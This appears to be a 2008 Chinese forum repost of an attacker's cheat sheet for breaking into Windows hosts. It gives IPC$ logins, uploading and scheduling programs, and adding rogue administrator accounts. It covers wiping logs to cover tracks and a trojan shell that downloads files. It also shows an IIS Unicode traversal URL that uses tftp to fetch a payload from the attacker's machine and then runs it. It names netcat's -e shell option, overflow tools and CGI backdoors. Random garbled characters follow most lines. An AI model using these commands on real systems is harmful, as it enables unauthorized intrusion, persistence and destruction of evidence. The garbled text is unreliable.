zhangandt
级别: 蓝色
精华:
0
发帖: 6320
威望: 1 点
金钱: 9198 RMB
贡献值: 0 点
在线时间:178(小时)
注册时间:2008-07-23
最后登录:2008-10-15
|
[转帖] 网管和黑客都必须知道的命令
网管和黑客都必须知道的命令!看了不要做坏事! 4
X`���^{~
T��
T"3�^@
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" (!�n-A�ge�
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" ryEvm��WYu
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ D4�4I"TgqD
(查看远程主机时间) net time \\IP地址 �C�4_t��_N
(定时启动某个程序) at \\IP地址 02:18 readme.exe ~�&~C#yjg1
(查看共享) net view \\IP地址 MVA��c8d�S
(查看netbios工作组列表) nbtstat -A IP地址 =�eYO;l
y3
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" n�\~yX<;X3
(这两条把自己增加到管理员组): net user 用户名 密码 /add M���cb<[~m
net localgroup Administrators 用户名 /add Z�OH
RU��m
(断开连接) net use \\IP地址\ipc$ /delete 6QptK�Xu�7
===================================================== g.&\�6^)8p
擦屁屁: ��p;ZDpR��
del C:\winnt\system32\logfiles\*.* gT7I9 (x!W
del C:\winnt\system32\config\*.evt b�VOO)
���
del C:\winnt\system32\dtclog\*.* +}]wLM}\UF
del C:\winnt\system32\*.log V���9�]uFL
del C:\winnt\system32\*.txt "j;!_v>=f`
del C:\winnt\*.txt % NwoU%q�
del C:\winnt\*.log �P#�9-bYNU
============================ r��N'k4V"K
一、netsvc.exe .=aMj�
rME
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: �,XP�@ �pi
netsvc /list \\IP地址 kjfxjA�S=m
netsvc schedule \\IP地址 /query $q=�h�c��u
netsvc \\IP地址 schedule /start ���*x�h�o�
二、OpenTelnet.exe "URVX1#(r�
远程启动主机的Telnet服务,并绑定端口到7878,例如: �!��-@SS>
OpenTelnet \\IP地址 用户名 密码 1 7878 F�.&��*D~f
然后就可以telnet到主机的7878端口,进入DOS方式下: *+#� k{D,�
telnet IP地址 7878 DOA�[iT";4
三、winshell.exe csm?oU�niz
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: �(��rMTW+,
p Path (查看winshell主程序的路径信息) ~9]Vy
�(�L
b reBoot (重新启动机器) �ook' u�}h
d shutDown (关闭机器) ���],WwqD=
s Shell (执行后你就会看到可爱的“C:\>”) -U&�098}<K
x eXit (退出本次登录会话,此命令并不终止winshell的运行) ggzAU�6J��
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) �%Gnd"SG�s
四、3389登陆器,GUI方式登录远程主机的
}qTv&Z�3$
五、elsave.exe (p}�9
^��Y
事件日志清除工具 7�UY('
Q[�
elsave -s \\IP地址 -l "application" -C �nau�~i1��
elsave -s \\IP地址 -l "system" -C B>�c��[Zg1
elsave -s \\IP地址 -l "security" -C pU��[a�[��
执行后成功清除应用程序日志,系统日志,安全日志 jLpgWt`8)E
六、hbulot.exe �;w��>Q{z�
开启win2kserver和winxp的3389服务 :c�Iu?�7�A
hbulot [/r] ix�o�MccU0
使用/r表示安装完成后自动重起目标使设置生效。 �~{kA)� :�
七、nc.exe(netcat.exe) y81#UD9��[
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 ([z<TS�#Md
想要连接到某处: nc [-options] hostname port[s] [ports] ... Zi�1��5wE
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] n:{��-Vv�t
参数: yAZ.L/j�yr
-e prog 程序重定向,一旦连接,就执行 [危险!!] 0�D��W'(#`
-g gateway source-routing hop point[s], up to 8 !]UU;8h�~
-G num source-routing pointer: 4, 8, 12, ... Vb"T],N1�m
-h 帮助信息 N69eI�d��l
-i secs 延时的间隔 �TWD|1
di0
-l 监听模式,用于入站连接
�B�[�2h �
-n 指定数字的IP地址,不能用hostname ��fS'k;r*r
-o file 记录16进制的传输 �V8|�q�"UX
-p port 本地端口号 v\r7.l:h�f
-r 任意指定本地及远程端口 l%Fse&�4\�
-s addr 本地源地址 Ouj��l��m|
-u UDP模式 eO[�Cb]Dy:
-v 详细输出——用两个-v可得到更详细的内容 d~xU?)n�)�
-w secs timeout的时间 cVv4g�QD�\
-z 将输入输出关掉——用于扫描时 Z�1MJ!{�@6
八、TFTPD32.EXE 8�=zM~v) �
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: � el��*pYI
http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 4q�2=:"z�4
然后可以直接令文件运行: \w@_(4")Qb
http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 cM7k�)��{�
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 TG�%hy"k��
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 2
vJ[vsrFv
一、一 Xscan命令行运行参数说明: I�P4b[|e�f
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 ��%J�A
&�O
1.命令格式: xscan -host [-] [其他选项] �.8u�wg@yD
xscan -file [其他选项] �^xk��ppN2
其中 含义如下: la"�A$Tbu~
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); �1j)�!d$�8
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); Hk~
��g�cG
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); :,z3�:P�L�
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); SAxa7�B/U2
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); �I3r�n�Cd(
[其他选项] 含义如下: { `�|YX_HS
-v: 显示详细扫描进度 ~F�CSq�
:_
-p: 跳过Ping不通的主机 �1�S.e��5{
-o: 跳过没有检测到开放端口的主机 )Po���I~km
-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10
|
|
|
|
[楼 主]
|
Posted: 2008-08-18 10:47 |
| |
五颜六色论坛 -> 电脑学校 -> [转帖] 网管和黑客都必须知道的命令
